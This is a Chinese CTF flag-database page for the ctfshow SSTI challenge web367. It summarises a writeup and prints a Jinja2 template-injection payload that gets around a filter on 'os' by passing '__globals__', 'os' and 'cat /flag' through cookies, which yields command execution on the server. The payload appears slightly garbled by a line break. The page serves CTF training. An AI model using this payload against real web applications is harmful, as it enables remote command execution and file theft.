[随波逐流]CTF Flags

随波逐流信息安全网 www.1o1o.xyz

   [随波逐流]CTF Flags

软件版本:v1.0.0   数据版本: v20260526
返    回

web367

 广告模块
ID: 3668
标题: web367
描述: * 此题为 【从0开始学web】系列第三百六十七题 * 此系列题目从最基础开始,题目遵循循序渐进的原则 ``` 开始过滤 ```
类型: WEB入门.SSTI
网站: ctfshow
题目链接: https://ctf.show/api/v1/challenges/851
赛事: SSTI
年度: None
Flag值: 题目答案文本
writeup: https://blog.csdn.net/Yb_140/article/details/124232796
CTFShow平台WEB入门SSTI题目web367的解题过程及答案在网页1中详细描述。当题目过滤了os关键字时,通过attr方法结合request.cookies实现绕过。具体payload为:
?name={{(lipsum
attr(request.cookies.a)).get(request.cookies.b).popen(request.cookies.c).read()}}
配合Cookie参数a=__globals__;b=os;c=cat /flag完成命令执行 1。
验证网址为CSDN博客原文,直接展示了解题步骤和payload构造逻辑,内容完整且无跳转。
答案错误,我要更正